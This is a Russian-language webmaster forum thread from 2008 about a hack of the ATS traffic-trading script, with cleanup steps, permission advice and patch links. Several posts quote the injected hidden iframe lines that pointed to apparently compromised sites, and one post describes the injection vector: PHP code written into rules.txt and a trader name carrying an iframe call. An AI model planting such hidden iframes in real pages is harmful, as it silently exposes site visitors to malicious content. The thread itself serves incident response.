Master-X
Форум | Новости | Статьи
Главная » Форум » CJs » 
Тема: Очень нестандартный трейдер или взлом АТS?
цитата
07/11/08 в 16:45
 ciberdem
файлы установок (/settings/*.php)
цитата
07/11/08 в 18:57
 Gidz
мне тут человек на армаде написал что в скрипте был закодирован сайт
Код:
<iframe src="http://www.celebritynympho.com/st/niches/z/static.
php" height="2" style="display:none" width="2"></iframe>


это так? чей сидж? мож на него написать чего нехорошего?
цитата
07/11/08 в 19:09
 miroz
Gidz писал:
мне тут человек на армаде написал что в скрипте был закодирован сайт
Код:
<iframe src="http://www.celebritynympho.com/st/niches/z/static.
php" height="2" style="display:none" width="2"></iframe>


это так? чей сидж? мож на него написать чего нехорошего?

Опа-на. Известный человек на AskDamage под ником Best-in-BC
Попробую отписать там.
цитата
07/11/08 в 19:43
 SamsonS
времени мало, спешил всё сделать, но забыл расшифровать пароль перед заменой.

В итоге не проходит пароль.
может кто сталкивался, знает как заменить/обнулить/ищё чего нибудь?
цитата
07/11/08 в 20:32
 $ilver
На нашем серваке были убиты все php файлы. Пришлось попотеть что бы все восстановить.
цитата
07/11/08 в 20:38
 von Stoltz
SamsonS писал:
времени мало, спешил всё сделать, но забыл расшифровать пароль перед заменой.

В итоге не проходит пароль.
может кто сталкивался, знает как заменить/обнулить/ищё чего нибудь?
в файле si.php меняем $a_login="логин", $a_password="пароль", $secured="0" заливаем файл обатно и входим в админку.
цитата
07/11/08 в 20:56
 mopani
Gidz писал:
мне тут человек на армаде написал что в скрипте был закодирован сайт
Код:
<iframe src="http://www.celebritynympho.com/st/niches/z/static.
php" height="2" style="display:none" width="2"></iframe>


это так? чей сидж? мож на него написать чего нехорошего?

А у меня было вот это
Код:
<iframe src="http://www.porngalleriesz.com/st/z/static.php" height="2" style="display:none" width="2"></iframe>

Возможно это в свою очередь ранее взломаные сиджы.
цитата
07/11/08 в 21:57
 Next
Закодированные в коде сиджи однозначно взломанные и используются для вставки говна через ифрейм. Так что утверждать что владельцы этих сиджев и есть уроды ошибочно!

пысы: один из моих сиджев как-то побывал в такой шкуре, кто-то понял ситуацию, ну, а кто-то (несколько тупых пендосов) тупо забанили навечно icon_smile.gif
цитата
07/11/08 в 22:00
 SamsonS
von Stoltz писал:
в файле si.php меняем $a_login="логин", $a_password="пароль", $secured="0" заливаем файл обатно и входим в админку.

СЕНКС!!! всё отлично поменял smail54.gif

- а что делать с subrules.txt?
цитата
07/11/08 в 23:39
 von Stoltz
Итак добро пожаловать за апгрейдом на ats-project.com
Вот несколько общих рекомендаций.
Если сайт не взломан:
1. убедиться, что на корневую папку установлены права не выше 755;
2. Проапгрейдить до 1.7.2 путем замены файлов;
3. Зашифровать пароль;
4. Для спокойного сна поставить права 444 на файлы /datafiles/rules.txt, datafiles/subrules.txt, templates/*.tpl, чтобы менять темплейты и правила из админки придется временно вернуть права 777.

Если уже поломали:
1. убедиться, что на корневую папку установлены права не выше 755;
2. удалить все php файлы, которые не похожи на файлы АТС (они могут быть в папках);
3. удалить файлы /datafiles/rules.txt, datafiles/subrules.txt;
4. Проапгрейдить до 1.7.2 путем замены файлов;
5. Вычистить темплейты (можно из админки);
6. создать заново правила для трейдеров Settings - Trade Rules;
7. Зашифровать пароль;
8. Для спокойного сна поставить права 444 на файлы /datafiles/rules.txt, datafiles/subrules.txt, templates/*.tpl, чтобы менять темплейты и правила из админки придется вернуть права 777.
цитата
08/11/08 в 00:25
 SamsonS
как насчет апдейта для 1.6.3 ?
цитата
08/11/08 в 00:33
 Pashich

тоже интересно
цитата
08/11/08 в 00:46
 Lost
тож интересно про 1.6.3
и также вопрос про апдэйт. версии 1.7 апдэйтить сразу можно на 1.7.2 рпостым перезалитием файлов?
цитата
08/11/08 в 03:43
 Pashich
наверно да - просто перезалить...но!
у меня например файлы ротатора поверх скрипта стоят в 1.6.3
кстати как правильно то? у кого как?
но если сначала ротатор поставить а потом скрипт то тоже работает
хотя я ставил сначала скрипт потом ротатор
цитата
08/11/08 в 07:47
 Diablo
miroz писал:
Опа-на. Известный человек на AskDamage под ником Best-in-BC
Попробую отписать там.


он тоже заломан . юзают зараженные домены , как балк хосты для следующих заражений =|
тот же хакер короче , или бригада , что и ат3-атх ломали .
цитата
08/11/08 в 09:38
 von Stoltz
Для 1.6.3 апдейт будет немного позже, апдейт 1.7 -> 1.7.2 тоже делается простой заменой файлов.
цитата
08/11/08 в 10:27
 rusawm
лучше отпишите хозяевам этих доменов пускай эти файлы потрут
цитата
08/11/08 в 14:58
 Kn
проапдейтился нормально
цитата
08/11/08 в 23:41
 von Stoltz
Для тех, кто использует 1.6.3 заплатки здесь:
http://www.ats-project.com/4.rar для PHP4
http://www.ats-project.com/5.rar для PHP5
просто замените файлы
цитата
09/11/08 в 04:18
 Burn
обновил файлы АТСа заплатками - код продолжает появляться. Почистил темплаты. Поставил права 555 на файлы и корневой каталог..
Может где-то я его не нашёл и он себя репродуцирует с каждой отработкой крона или ещё хз как..

Может я не соблюдаю очерёдность правильную ??

И когда ставлю Secured на пароль - потом не могу зайти в админку.
приходиться обновлять пасс заменой si.php
в чём может быть фишка?
Никак не могу одолеть эту хрень (((
цитата
09/11/08 в 06:19
 Lin
Burn писал:
обновил файлы АТСа заплатками - код продолжает появляться.

Так видимо в обновлении пофиксили баг, тоесть не получится таким образом взломать теперь. А если какашка уже сидит на серваке, почистить надо, там выше Soft-Com писал как.
цитата
09/11/08 в 06:39
 Burn
код больше не появляется - вроде почистил.
Топ лист отображается - нашёл причину.
Вот на счёт установки секьюрности паролю у меня до сих пор вопросы..
Устанавливаю секьюрность - не могу залогиниться.
подскажите где искать причину этого, плз.
цитата
09/11/08 в 07:58
 sllimm
Цитата:
удалить все php файлы, которые не похожи на файлы АТС

А какие файлы непохожи?
/settings
si
os
ms
mi
is
if
cm
ca
bg
цитата
09/11/08 в 11:28
 true
sllimm писал:
А какие файлы непохожи?
/settings
si
os
ms
mi
is
if
cm
ca
bg

mi, bg лишнии
цитата
09/11/08 в 14:26
 von Stoltz
Burn писал:

Вот на счёт установки секьюрности паролю у меня до сих пор вопросы..
Устанавливаю секьюрность - не могу залогиниться.
подскажите где искать причину этого, плз.

Чтобы зашифровать пароль на файл settings/si.php должны быть права 666 или выше, после шифрования права можно уменьшить.

Как я понимаю механизм взлома, права на файлы установок особой роли не играли, критичной оказалась возможность записи в rules.txt пхп кода, а также добавление трейдера с хитрожопым названием, содержащим вызов ифрейма.
В новой версии, все эти фокусы не пройдут. Но пароль в открытом виде держать все равно не рекомендуется, а также желательно исключить возможность записи в темплейты после их создания, это, кстати относится не только к АТС, но всем скриптам ротаторов.
Необычные пхп файлы - все, отличающиеся от стандартных АТС в корне, а также в папках, где пхп файлов быть не должно: /ipfiles, /logfiles, /tradefiles
Стр. « первая   <  3, 4, 5, 6, 7  >  последняя »


Эта страница в полной версии